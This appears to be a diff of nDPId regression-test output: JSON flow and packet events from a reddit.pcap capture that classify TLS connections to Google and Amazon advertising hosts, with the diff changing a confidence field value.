00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605291690373,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690373,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2UAAAAAoAL9IFr7AAACBAWgBAIIClRf7UgAAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690384,"flow_last_seen":1605291690384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690384,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605291690384,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690384,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDEAAAAAoAL9IAqWAAACBAWgBAIICgxmJysAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9082,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605291690396,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690396,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHPls7Xl4+krtmoBJXgDq4AAACBAV4AQMDAwQCCArC10mNVF\/tSA=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9083,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605291690396,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690396,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2ZbO15fgBAB+76yAAABAQgKVF\/tX8LXSY0="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9084,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690373,"flow_last_seen":1605291690396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690396,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9084,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690373,"flow_last_seen":1605291690396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690396,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9086,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605291690402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690402,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvnyP\/5OOmbspwyoBJXgGsCAAACBAV4AQMDAwQCCArC10mUDGYnKw=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9087,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1605291690402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690402,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDL\/+TjqgBAB++8BAAABAQgKDGYnPcLXSZQ="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9088,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690384,"flow_last_seen":1605291690403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690403,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9088,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690384,"flow_last_seen":1605291690403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690403,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690405,"flow_last_seen":1605291690405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690405,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605291690405,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690405,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15YAAAAAoAL9IOjCAAACBAWgBAIICgKUPwEAAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690421,"flow_last_seen":1605291690421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1605291690421,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690421,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYMAAAAAoAL9IIEIAAACBAWgBAIICl8E6ogAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9093,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605291690440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690440,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADRffKUqAcsBIEmLB5kd7IUo3\/YpAbu2Nv\/zx++bDteXoBJXgLoLAAACBAV4AQMDAwQCCArC10m3ApQ\/AQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1605291690440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690440,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15f\/88fwgBAB+z36AAABAQgKApQ\/JMLXSbc="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9095,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690405,"flow_last_seen":1605291690440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690440,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9096,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690373,"flow_last_seen":1605291690448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9095,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690405,"flow_last_seen":1605291690440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690440,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9096,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690373,"flow_last_seen":1605291690448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9098,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690449,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvo6PvOtUOc0w2EoBJXgGkiAAACBAV4AQMDAwQCCArC10m3XwTqiA=="} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9099,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690384,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9099,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690384,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690449,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYT7zrVEgBAB++0WAAABAQgKXwTqpcLXSbc="} -01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690421,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9134,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690421,"flow_last_seen":1605291690483,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690483,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690405,"flow_last_seen":1605291690501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1877,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1605291690501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9166,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291690405,"flow_last_seen":1605291690502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5957,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1605291690502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","server_names":"aax-eu.amazon-adsystem.com,aax.amazon-adsystem.com,aax-cpm.amazon-adsystem.com,aax-dtb-web.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=aax-eu.amazon-adsystem.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"5D:18:8E:CB:B7:91:5C:79:26:B5:08:49:FF:2C:24:D8:06:54:91:8B"}} +01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690421,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9134,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690421,"flow_last_seen":1605291690483,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690483,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690405,"flow_last_seen":1605291690501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1877,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1605291690501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 